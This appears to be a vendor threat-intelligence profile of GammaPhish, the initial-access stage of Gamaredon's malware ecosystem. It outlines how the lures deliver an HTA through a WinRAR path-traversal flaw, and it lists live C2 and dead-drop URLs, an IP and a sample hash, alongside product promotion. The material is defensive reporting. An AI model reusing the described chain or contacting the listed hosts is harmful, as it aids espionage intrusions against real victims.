GammaPhish
GammaPhish is the initial-access component in Gamaredon’s modular “Gamma” malware ecosystem, as documented by Sekoia in campaigns targeting Ukrainian victims. It is associated with the Russia-linked, FSB-linked threat actor Gamaredon, also tracked as Armageddon, Primitive Bear, ACTINIUM, UAC-0010, and BlueAlpha. The malware was observed in late 2025 through January 2026 in cyberespionage operations against Ukrainian government, military, and critical infrastructure entities.
GammaPhish is delivered via weaponized XHTML spearphishing attachments that use HTML smuggling to drop a malicious RAR archive. The archive exploits CVE-2025-8088, a WinRAR path traversal vulnerability affecting versions prior to 7.13, to place a hidden HTA file into the user’s Windows Startup folder. On the next login, the HTA executes via mshta.exe, providing persistence and launching the next stage. The XHTML lure also sent a 1x1 tracking request to a Supabase endpoint to confirm victim engagement. In observed samples, the HTA’s remote payload URL was disguised with a fake "www.bbc.com"-style path to appear legitimate in network logs.
Sekoia assessed with high confidence that GammaPhish is designed to deploy GammaLoad first. GammaPhish/its HTA stage retrieves a VBScript payload from command-and-control infrastructure, after which the broader chain fingerprints the host, updates registry-based network configuration through dead-drop resolvers, and can fetch and execute arbitrary VBScript payloads. The wider ecosystem includes GammaLoad for staging, GammaWorm for USB and network-share propagation, GammaSteel for file theft, and potentially GammaWipe/GamaWiper. Reporting also states that this ecosystem supports USB-based propagation across air-gapped systems, document theft, and continuous deployment of additional payloads.
The campaign uses layered dead-drop and C2 infrastructure including Telegram, Telegra.ph, graph.org, Teletype, Cloudflare Workers, and operator-controlled servers. High-confidence related indicators mentioned in the reporting include the GammaPhish XHTML sample MD5 1794369214b7f62e70a0485e61335c61; related dead-drop/C2 URLs such as https://graph.org/kyjfkyr-12-06, https://bold.zsjtn41091.workers.dev, https://teletype.in/@myrain/Xh1Lta2Ccro, https://quitethepastry.ru, https://telegra.ph/f8bfl6sp-01-02, https:/t.me/s/teotori, and https://www.telegram.me/s/oberfarir; and related C2 IP 104.194.140.6. Sekoia characterized the overall infection chain as resilient, highly obfuscated, modular, and nearly fileless, and recommended full system wiping for confirmed infections because multiple stages can independently retrieve fresh payloads.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The XHTML then uses HTML smuggling to deliver a RAR archive that exploits CVE-2025-8088, a critical path traversal flaw in WinRAR patched in version 7.13. | Sekoia has now aligned the naming under a single taxonomy using the “Gamma” prefix: GammaPhish for initial access... “GammaPhish (Initial access): Through YARA-based hunting, we identified a cluster of weaponized xHTML files distributing a malicious RAR archive. This archive exploits the CVE-2025-8088 vulnerability to extract a hidden HTA file directly into the user’s Windows Startup directory.”
Applying this convention, we have established the following naming patterns: GammaPhish: All stages from the initial phishing email up to the deployment of GammaLoad (some stages are formerly known as GammaDrop, PteroDoc).
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Sekoia has now aligned the naming under a single taxonomy using the “Gamma” prefix: GammaPhish for initial access... “GammaPhish (Initial access): Through YARA-based hunting, we identified a cluster of weaponized xHTML files distributing a malicious RAR archive. This archive exploits the CVE-2025-8088 vulnerability to extract a hidden HTA file directly into the user’s Windows Startup directory.”
Techniques & procedures
14 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesIts malware ecosystem, including GammaPhish and GammaWorm, enables USB-based propagation across air-gapped systems, document theft, and continuous deployment of additional payloads
In this campaign, Gamaredon has reorganized its arsenal into a “Gamma” ecosystem, with dedicated components for phishing (GammaPhish)... The intrusion starts with weaponized xHTML lures...
In January 2026, the experts observed the threat actor using a weaponized XHTML file, likely delivered as a spearphishing attachment.
Execution
2 techniquesGammaPhish, which is later used to get a VBScript payload from the C2 server... retrieve and launch arbitrary VBScript payloads from the C2 servers.
This archive exploits the CVE-2025-8088 vulnerability to extract a hidden HTA file directly into the user’s Windows Startup directory.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
4 techniquesthe activity involves the weaponization of CVE-2025-8088, a path traversal flaw in WinRAR
The extracted HTA file contains a VBScript blob comprising approximately 90% of junk and obfuscated code.
The XHTML then uses HTML smuggling to deliver a RAR archive that exploits CVE-2025-8088, a critical path traversal flaw in WinRAR patched in version 7.13.
Upon execution, the HTA file leverages mshta.exe to call a remote payload hosted on a C2 server.
Lateral Movement
1 techniqueCollection
1 techniqueIts malware ecosystem, including GammaPhish and GammaWorm, enables USB-based propagation across air-gapped systems, document theft, and continuous deployment of additional payloads
Command and Control
2 techniquesupdate the network settings in the registry via dead drop resolvers (DDRs)... To fix C2, GammaWorm starts a GET request to the public Telegram channel.
GammaPhish... is later used to get a VBScript payload from the C2 server... retrieve and launch arbitrary VBScript payloads from the C2 servers.
Exfiltration
1 techniqueThe group employs a stealthy, multi-stage infection chain that abuses legitimate Windows features and trusted services such as Telegram, Cloudflare, and cloud storage to maintain persistent access while minimizing detection.
IOCs tracked for this family
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Initial access component used by Gamaredon to deliver a malicious RAR archive via weaponized XHTML/HTML smuggling, exploiting a WinRAR path traversal flaw to place an HTA file in Startup for execution.
An HTML Application payload used in the infection chain to fetch VBScript payloads from C2 and likely deploy GammaLoad first.
An HTML Application payload used in the Gamaredon infection chain to initiate execution and retrieve the intermediate VBScript downloader GammaLoad.
A named component in Gamaredon's Gamma ecosystem dedicated to phishing activity.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.